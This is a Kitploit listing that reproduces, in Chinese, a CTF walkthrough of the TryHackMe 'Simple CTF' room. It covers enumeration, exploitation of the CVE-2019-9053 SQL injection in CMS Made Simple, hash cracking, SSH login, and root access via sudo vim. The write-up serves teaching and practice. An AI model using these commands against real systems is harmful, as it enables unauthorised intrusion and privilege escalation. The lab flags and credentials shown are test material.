Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
Simple-CTF-Writeup — 专业的 TryHackMe Simple CTF 演练,涵盖枚举、CMS Made Simple SQL 注入(CVE-2019-9053)、凭据恢复、SSH 访问、通过 Vim 提权,以及获取 root 权限。 | Kitploit
工具/GitHubGitHub/imperialx1104/simple-ctf-writeup
密码破解权限提升侦察漏洞分析漏洞利用Web应用程序漏洞利用CTF渗透测试学习与教育
GitHubimperialx1104/simple-ctf-writeup

Simple-CTF-Writeup

专业的 TryHackMe Simple CTF 演练,涵盖枚举、CMS Made Simple SQL 注入(CVE-2019-9053)、凭据恢复、SSH 访问、通过 Vim 提权,以及获取 root 权限。

43个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库

Simple-CTF-Writeup

专业的 TryHackMe Simple CTF 通关指南,涵盖枚举、CMS Made Simple SQL 注入(CVE-2019-9053)、凭据恢复、SSH 访问、通过 Vim 进行权限提升以及获取 root 权限。

TryHackMe - Simple CTF Writeup

这是 TryHackMe 上 Simple CTF 房间的完整通关指南,涵盖侦察、枚举、漏洞利用、凭据恢复、权限提升以及获取 flag。


房间信息

字段值
平台TryHackMe
房间名称Simple CTF
难度简单
分类Web 漏洞利用与 Linux 权限提升
作者Saahil Gupta (ImperialX1104)

目标

本房间的目标是:

  • 枚举目标机器
  • 发现隐藏的服务和应用程序
  • 利用存在漏洞的 CMS
  • 恢复凭据
  • 获取 SSH 访问权限
  • 将权限提升至 root
  • 捕获两个 flag

攻击流程概览

root@kitploit:~
Host Discovery
      │
      ▼
Port Enumeration
      │
      ▼
Directory Enumeration
      │
      ▼
CMS Discovery
      │
      ▼
Version Identification
      │
      ▼
SQL Injection (CVE-2019-9053)
      │
      ▼
Credential Extraction
      │
      ▼
Password Cracking
      │
      ▼
SSH Access
      │
      ▼
User Flag
      │
      ▼
Privilege Escalation
      │
      ▼
Root Flag

侦察

主机发现

第一步是验证与目标机器的连通性。

命令

root@kitploit:~
ping 10.49.175.174

结果

主机成功响应,确认目标可达。

截图

Ping Scan


端口枚举

执行了一次全面的 Nmap 扫描,以识别暴露的服务。

命令

root@kitploit:~
nmap -A -v 10.49.175.174

结果

端口服务版本
21FTPvsftpd 3.0.3
80HTTPApache 2.4.18
2222SSHOpenSSH 7.2p2

重要发现

  • 已启用匿名 FTP 登录
  • 运行着 Apache Web 服务器
  • SSH 暴露在 2222 端口
  • 发现 robots.txt 文件

截图

Nmap Enumeration


Web 枚举

访问目标 Web 服务器时,页面显示的是 Apache 默认首页。

URL

root@kitploit:~
http://10.49.175.174

截图

Apache Default Page

在这个阶段,没有看到明显的攻击面。


目录枚举

为了识别隐藏资源,使用 FFUF 对目录进行了暴力枚举。

命令

root@kitploit:~
ffuf -u http://10.49.175.174/FUZZ \
-w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt \
-fc 200

结果

root@kitploit:~
simple [Status: 301]

截图

FFUF Enumeration

发现了一个名为 /simple 的目录。


CMS 发现

访问发现的目录后,发现了一个已安装的 CMS。

URL

root@kitploit:~
http://10.49.175.174/simple

截图

CMS Made Simple

识别出的 CMS

root@kitploit:~
CMS Made Simple 2.2.8

这个版本号后来被证明至关重要。


漏洞研究

使用 SearchSploit 对该 CMS 版本进行了漏洞研究。

命令

root@kitploit:~
searchsploit "CMS Made Simple"

结果

root@kitploit:~
CMS Made Simple < 2.2.10 - SQL Injection

截图

SearchSploit Results

识别出一个已知的 SQL 注入漏洞。


漏洞利用代码获取

将漏洞利用代码复制到本地,以便进行分析和执行。

命令

root@kitploit:~
searchsploit -m 46635

输出

root@kitploit:~
CMS Made Simple < 2.2.10 - SQL Injection
CVE-2019-9053

截图

Exploit Download


漏洞利用

针对目标 CMS 实例执行了公开可用的漏洞利用代码。

命令

root@kitploit:~
python3 exploit.py \
-u http://10.49.175.174/simple/ \
--crack \
-w /usr/share/wordlists/rockyou.txt

凭据提取

该漏洞利用代码成功从后端数据库中提取了信息。

输出

root@kitploit:~
[+] Salt for password found: 1dac0d92e9fa6bb2
[+] Username found: mitch
[+] Email found: [email protected]

截图

Credential Extraction

恢复的信息

项目值
用户名mitch
邮箱[email protected]
盐值1dac0d92e9fa6bb2

密码破解

使用 Hashcat 破解了提取出的哈希值。

命令

root@kitploit:~
hashcat -m 20 hash.txt --show

输出

root@kitploit:~
0c01f4468bd75d7a84c7eb73846e8d96:1dac0d92e9fa6bb2:secret

恢复的凭据

字段值
用户名mitch
密码secret

截图

Hashcat Password Recovery


初始访问

使用恢复的凭据对 SSH 服务进行了测试。

命令

root@kitploit:~
ssh [email protected] -p 2222

密码

root@kitploit:~
secret

结果

root@kitploit:~
Welcome to Ubuntu 16.04.6 LTS

截图

SSH Access

认证成功后,以用户 mitch 的身份获得了 Shell 访问权限。


用户 Flag

获得访问权限后,在 Mitch 的主目录中找到了用户 flag。

命令

root@kitploit:~
whoami
cd ~
cat user.txt

输出

root@kitploit:~
G00d j0b, keep up!

截图

User Flag


权限提升

Sudo 枚举

检查 sudo 权限时,发现了一个有趣的配置。

命令

root@kitploit:~
sudo -l

输出

root@kitploit:~
User mitch may run the following commands on Machine:
    (root) NOPASSWD: /usr/bin/vim

截图

sudo -l Output

该配置允许用户无需输入密码即可使用 root 权限执行 Vim。


Root 权限获取

以 root 身份启动 Vim:

root@kitploit:~
sudo vim

由于 Vim 以提升的权限运行,因此可以利用它访问 root 拥有的文件。

截图

Root Access via Vim


Root Flag

root flag 位于 root 用户目录中。

命令

root@kitploit:~
:! cat /root/root.txt

输出

root@kitploit:~
W3ll d0n3. You made it!

截图

Root Flag


已获取的 Flag

用户 Flag

root@kitploit:~
G00d j0b, keep up!

Root Flag

root@kitploit:~
W3ll d0n3. You made it!

攻击链总结

root@kitploit:~
Nmap Scan
    ↓
Web Enumeration
    ↓
Directory Discovery (/simple)
    ↓
CMS Made Simple 2.2.8
    ↓
SearchSploit Research
    ↓
CVE-2019-9053 SQL Injection
    ↓
Credential Extraction
    ↓
Hash Cracking
    ↓
SSH Login (mitch:secret)
    ↓
User Flag
    ↓
sudo -l
    ↓
Vim Privilege Escalation
    ↓
Root Flag

经验教训

枚举很重要

存在漏洞的 CMS 在首页上不可见,需要借助目录枚举才能发现。

识别版本至关重要

确定 CMS 的确切版本后,直接找到了对应的已知漏洞。

凭据重用

恢复出的凭据应始终在所有可用服务上进行测试。

Sudo 配置错误很危险

允许以特权执行 Vim 等编辑器,可能导致整个系统被攻陷。


使用的工具

  • Nmap
  • FFUF
  • SearchSploit
  • Python
  • Hashcat
  • SSH
  • Vim

结论

该房间展示了一条从初始枚举到完全获取 root 权限的完整攻击链。通过结合 Web 应用枚举、SQL 注入利用、密码破解和 Linux 权限提升等技术,最终完全控制了目标系统。

该房间是了解真实世界渗透测试方法论的绝佳入门,同时强调了及时修补软件、保障凭据安全以及实施最小权限访问控制的重要性。


作者

Saahil Gupta (ImperialX1104)

  • GitHub: https://github.com/ImperialX1104
  • TryHackMe: ImperialX

⭐ 如果你觉得这篇 Writeup 对你有帮助,请考虑为本仓库点一个 Star,并在 GitHub 上与我联系。

下载工具